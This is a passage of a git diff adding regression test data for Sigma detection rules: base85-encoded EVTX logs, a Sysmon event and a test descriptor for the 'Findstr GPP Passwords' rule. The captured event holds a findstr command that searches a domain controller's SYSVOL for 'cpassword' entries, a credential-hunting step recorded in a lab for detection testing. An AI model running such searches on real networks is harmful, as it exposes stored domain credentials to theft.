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 bzkWXT-+ZiX!jhf`KAmgA?86p!!_WT#)gf{! literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json new file mode 100644 index 000000000..98a4da0c2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:50:13.199218Z" + } + }, + "EventRecordID": 9105822, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:50:13.191", + "ProcessGuid": "5AA13A44-D595-68FC-0A31-000000004002", + "ProcessId": 7772, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr /S cpassword \\\\AR-WIN-DC\\sysvol\\*.xml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml new file mode 100644 index 000000000..2ad8b04be --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml @@ -0,0 +1,13 @@ +id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 91a2c315-9ee6-4052-a853-6f6a8238f90d + title: Findstr GPP Passwords +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx b/regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d02e83bf9bb33c07cb2e0518f2e3fee12377172f GIT binary patch literal 69632 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 